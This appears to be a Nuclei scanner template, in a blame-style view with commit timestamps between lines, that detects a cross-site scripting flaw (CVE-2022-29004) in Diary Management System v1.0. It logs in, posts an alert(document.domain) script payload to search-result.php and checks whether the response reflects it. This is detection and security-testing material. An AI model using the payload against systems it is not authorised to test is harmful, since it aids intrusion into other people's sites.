2022-09-01 12:51:44 +00:00
|
|
|
id: CVE-2022-29004
|
2022-09-02 13:59:31 +00:00
|
|
|
|
2022-09-01 12:51:44 +00:00
|
|
|
info:
|
2022-09-02 13:59:31 +00:00
|
|
|
name: Diary Management System v1.0 - Cross-Site scripting
|
2022-09-01 12:51:44 +00:00
|
|
|
author: TenBird
|
2022-09-02 13:59:31 +00:00
|
|
|
severity: medium
|
|
|
|
description: |
|
|
|
|
Diary Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Name parameter in search-result.php.
|
2022-09-01 12:51:44 +00:00
|
|
|
reference:
|
2022-09-02 13:59:31 +00:00
|
|
|
- https://github.com/sudoninja-noob/CVE-2022-29004/blob/main/CVE-2022-29004.txt
|
|
|
|
- https://phpgurukul.com/e-diary-management-system-using-php-and-mysql/
|
2022-09-01 12:51:44 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-29004
|
|
|
|
classification:
|
|
|
|
cve-id: CVE-2022-29004
|
2022-09-02 13:59:31 +00:00
|
|
|
metadata:
|
|
|
|
verified: true
|
|
|
|
tags: cve,cve2022,xss,authenticated,edms
|
2022-09-01 12:51:44 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /edms/login.php HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
|
|
|
|
logindetail={{username}}&userpassword={{password}}&login=
|
|
|
|
|
|
|
|
- |
|
|
|
|
POST /edms/search-result.php HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
|
|
|
|
searchdata=<script>alert(document.domain);</script>
|
|
|
|
|
|
|
|
cookie-reuse: true
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
2022-09-02 13:59:31 +00:00
|
|
|
- 'Serach Result Against "<script>alert(document.domain);</script>'
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|